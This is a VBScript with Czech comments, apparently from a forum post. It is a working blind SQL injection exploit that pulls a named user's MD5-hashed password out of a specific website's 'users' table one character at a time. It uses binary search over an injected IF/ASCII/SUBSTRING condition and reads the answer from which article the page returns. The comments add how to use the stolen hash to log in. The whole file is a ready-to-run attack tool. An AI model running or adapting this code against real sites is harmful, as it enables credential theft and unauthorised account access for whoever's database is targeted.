Option Explicit
' Script zjisti heslo z databaze pro zadany login. Heslo je ulozene ve forme
' MD5 hashe. Po ziskani hesla je z neho potreba 3x vypocitat MD5 hash. MD5(MD5(MD5($heslo))).
' Prihlaseni se pak provede nasledovne:
' [link]
Const passwordLength = 32
Const articleTrueId = 174
Const articleTrueText = "WWWhack"
Const articleFalseId = 171
Const articleFalseText = "Nslookup"
Dim scriptName, login
Main
Function charCodeSeq(ByVal chars)
Dim i,length
length = Len(chars)
charCodeSeq = "CONCAT("
For i = 1 To length - 1
charCodeSeq = charCodeSeq & "CHAR(" & Cstr(Asc(Mid(chars,i,1))) & "),"
Next
If length > 0 Then
charCodeSeq = charCodeSeq & "CHAR(" & Cstr(Asc(Mid(chars,length,1))) & ")"
End if
charCodeSeq = charCodeSeq & ")"
End Function
Function testCharVal(ByVal offset,ByVal operator,ByVal value)
Dim XHR, t, v, url
Set XHR = CreateObject("MSXML2.XMLHTTP")
t = "ASCII(SUBSTRING((SELECT heslo FROM users WHERE UPPER(login) = " & charCodeSeq(UCase(login)) & ")," & Cstr(offset) & ",1)) " & operator & " " & Cstr(value)
v = "IF(" & t & "," & CStr(articleTrueId) & "," & CStr(articleFalseId) & ")"
url = "[link]" & Escape(v)
XHR.Open "GET",url,False
XHR.Send NULL
If InStr(XHR.responseText,articleTrueText) Then
testCharVal = True
ElseIf InStr(XHR.responseText,articleFalseText) Then
testCharVal = False
Else
Err.Raise 1, scriptName & ".testCharVal", "Nepredvidana odpoved serveru"
End if
End Function
Function findChar(ByVal offset,Byval l,ByVal r)
Dim m,c
Do While r >= l
m = (l + r) \ 2
If testCharVal(offset,"<",m) Then
r = m - 1
ElseIf testCharVal(offset,">",m) Then
l = m + 1
ElseIf testCharVal(offset,"=",m) Then
findChar = Chr(m)
Exit Function
Else
findChar = False
Exit Function
End if
Loop
findChar = False
End Function
Sub Main()
Dim FSO
Dim i,r,password
If WScript.arguments.length <> 1 Then
WScript.Echo "Syntaxe: " & scriptName & " login"
WScript.Quit 1
End if
scriptName = WScript.ScriptName
login = WScript.arguments(0)
WScript.Echo "Login: " & login
WScript.Echo "Delka hesla: " & passwordLength
WScript.Echo ""
For i = 1 To passwordLength
r = findChar(i,0,255)
If VarType(r) = vbString Then
WScript.Echo "Pocet zjistenych znaku " & i & " z " & passwordLength
password = password & r
WScript.Echo "Heslo: " & password & String(passwordLength - i,"?")
Else
WSCript.Echo "Nepodarilo se zjistit znak"
Exit Sub
End if
Next
End Sub
'[link] (odpovědět) |